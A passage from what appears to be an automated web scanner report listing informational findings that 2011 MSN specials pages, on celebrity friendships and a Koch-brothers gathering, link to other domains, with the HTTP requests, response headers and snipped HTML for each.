<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.312. http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Unlikely-celebrity-friendships.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx?cp-documentid=27254149&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Jennifer+Lopez+&form=msnsea
http://www.bing.com/search?q=Jimmy+Fallon&form=msnsea
http://www.bing.com/search?q=Jon+Bon+Jovi&form=msnsea
http://www.bing.com/search?q=Snoop+Dogg&form=msnsea
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/search?q=mel+gibson+britney+spears+vacation&form=msnsea
http://www.bing.com/search?q=oprah+winfrey+gayle+king&form=msnsea
http://www.bing.com/search?q=unlikely+celebrity+friendships&FORM=msnsea
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345085&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FUnlikely-celebrity-friendships.aspx%3Fcp-documentid%3D27254149%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Entertainment/Unlikely-celebrity-friendships.aspx?cp-documentid=27254149&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=eb6312f3f35042fbb36a3783d2971579; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=AB5CA1AD1FE849E6AD6241405BF5EE36; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:25 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 31981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345085&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FUnlikely-celebrity-friendships.aspx%3Fcp-documentid%3D27254149%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=unlikely+celebrity+friendships&FORM=msnsea"><strong>
...[SNIP]...
<div>While most celebrity friendships seem like they were <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=oprah+winfrey+gayle+king&form=msnsea">made for one another</a> others are <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mel+gibson+britney+spears+vacation&form=msnsea">utterly unlikely</a>
...[SNIP]...
<div>Check out the following list of improbable celebrity pals and find out who <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Jimmy+Fallon&form=msnsea">Jimmy Fallon</a>, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Jon+Bon+Jovi&form=msnsea">Jon Bon Jovi</a>, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Snoop+Dogg&form=msnsea">Snoop Dogg</a>, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Jennifer+Lopez+&form=msnsea">Jennifer Lopez</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.313. http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Entertainment/Unlikely-celebrity-friendships.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx?cp-documentid=27254149&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Jennifer+Lopez+&form=msnsea
http://www.bing.com/search?q=Jimmy+Fallon&form=msnsea
http://www.bing.com/search?q=Jon+Bon+Jovi&form=msnsea
http://www.bing.com/search?q=Snoop+Dogg&form=msnsea
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=mel+gibson+britney+spears+vacation&form=msnsea
http://www.bing.com/search?q=oprah+winfrey+gayle+king&form=msnsea
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=unlikely+celebrity+friendships&FORM=msnsea
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406710&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FUnlikely-celebrity-friendships.aspx%3Fcp-documentid%3D27254149%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:30 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=74bfb9b7b806414693934cf997542695; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8F7326ED4BB44C3B9E44677277454C73; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:30 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 31961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406710&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FEntertainment%2FUnlikely-celebrity-friendships.aspx%3Fcp-documentid%3D27254149%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=unlikely+celebrity+friendships&FORM=msnsea"><strong>
...[SNIP]...
<div>While most celebrity friendships seem like they were <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=oprah+winfrey+gayle+king&form=msnsea">made for one another</a> others are <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mel+gibson+britney+spears+vacation&form=msnsea">utterly unlikely</a>
...[SNIP]...
<div>Check out the following list of improbable celebrity pals and find out who <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Jimmy+Fallon&form=msnsea">Jimmy Fallon</a>, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Jon+Bon+Jovi&form=msnsea">Jon Bon Jovi</a>, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Snoop+Dogg&form=msnsea">Snoop Dogg</a>, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Jennifer+Lopez+&form=msnsea">Jennifer Lopez</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.314. http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Billionaires-caucus.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx?cp-documentid=27464338

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=Charles+and+David+Koch+&FORM=msnpop
http://www.bing.com/images/search?q=rancho+las+palmas+resort&go=&form=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/maps/default.aspx?q=Davos+Switzerland&mkt=en-US&FORM=msnpop
http://www.bing.com/search?q=Koch+brothers+and+and+energy+and+other+industries&go=&form=msnpop
http://www.bing.com/search?q=Koch+brothers+and+suspended+California%27s+climate+change+programs&go=&form=msnpop
http://www.bing.com/search?q=billionaires+caucus&go=&form=msnpop
http://www.bing.com/search?q=billionaires+caucus+and+activists+and+protest&form=msnpop
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406685&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FBillionaires-caucus.aspx%3Fcp-documentid%3D27464338&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/Billionaires-caucus.aspx?cp-documentid=27464338 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:05 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=5bb9558c3a634e0b8bcd485118a777c4; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5C3FE70BEDFA4B11A600F7E11A761566; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:05 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406685&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FBillionaires-caucus.aspx%3Fcp-documentid%3D27464338&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=billionaires+caucus&go=&form=msnpop"><strong>
...[SNIP]...
<div>Billionaires Charles and David Koch (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=Charles+and+David+Koch+&FORM=msnpop">photos</a>) and their wealthy Republican friends are meeting at the Rancho Las Palmas Resort in Palm Springs, Calif., today. The brothers (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Koch+brothers+and+suspended+California%27s+climate+change+programs&go=&form=msnpop">find out what proposal they recently backed</a>) are reportedly the organizers, and the gathering likely will be <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=billionaires+caucus+and+activists+and+protest&form=msnpop">met with protests</a>
...[SNIP]...
<div>Many of the world...s top leaders are meeting elsewhere. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/maps/default.aspx?q=Davos+Switzerland&mkt=en-US&FORM=msnpop">See where.</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=rancho+las+palmas+resort&go=&form=msnpop">See photos</a>
...[SNIP]...
<div>Find out how the Koch brothers <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Koch+brothers+and+and+energy+and+other+industries&go=&form=msnpop">made their money</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.315. http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Billionaires-caucus.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx?cp-documentid=27464338

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=Charles+and+David+Koch+&FORM=msnpop
http://www.bing.com/images/search?q=rancho+las+palmas+resort&go=&form=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/maps/default.aspx?q=Davos+Switzerland&mkt=en-US&FORM=msnpop
http://www.bing.com/search?q=Koch+brothers+and+and+energy+and+other+industries&go=&form=msnpop
http://www.bing.com/search?q=Koch+brothers+and+suspended+California%27s+climate+change+programs&go=&form=msnpop
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=billionaires+caucus&go=&form=msnpop
http://www.bing.com/search?q=billionaires+caucus+and+activists+and+protest&form=msnpop
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345066&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FBillionaires-caucus.aspx%3Fcp-documentid%3D27464338&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:06 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=2db8a5d7e0384d16ae6190a3322af9a7; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D3C35436CD3248958F6D41D92F69C552; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:06 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
